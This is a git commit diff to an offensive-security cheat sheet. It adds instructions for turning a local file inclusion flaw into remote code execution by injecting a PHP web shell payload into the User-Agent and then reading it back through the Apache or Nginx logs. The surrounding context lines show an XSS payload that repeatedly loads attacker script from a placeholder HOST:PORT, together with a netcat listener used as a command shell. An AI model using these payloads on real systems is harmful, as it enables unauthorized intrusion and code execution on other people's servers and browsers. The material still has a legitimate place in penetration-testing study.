Update Cheat Sheet.md

2025-02-16 12:08:24 +00:00 · 2021-04-14 05:46:59 +05:00 · 2021-04-14 05:46:59 +05:00 · 182cf1ac95
commit 182cf1ac95
parent d75fc91bc3
1 changed files with 12 additions and 0 deletions
--- a/Sheet.md
+++ b/Sheet.md
@ -386,6 +386,18 @@ https://github.com/intrudir/403fuzzer <br />
 Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
 Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
 ```
+### LFI To RCE
+
+If LFI vulnerability exists we can read and poison logs
+
+#### Apache2
+
+For apache `/var/log/apache2/access.log` try to access the log and if we can then add `<?php system($_GET['c']); ?>`in User-agent<br/>
+
+#### Niginx
+
+For niginx `/var/log/nginx/error.log` try to access the log and if we can then add `<?php system($_GET['c']); ?>` in User-agent or try to add it in a file having a paramter make sure it's not being url encoded <br/>
+

 ### XSS Session Hijacking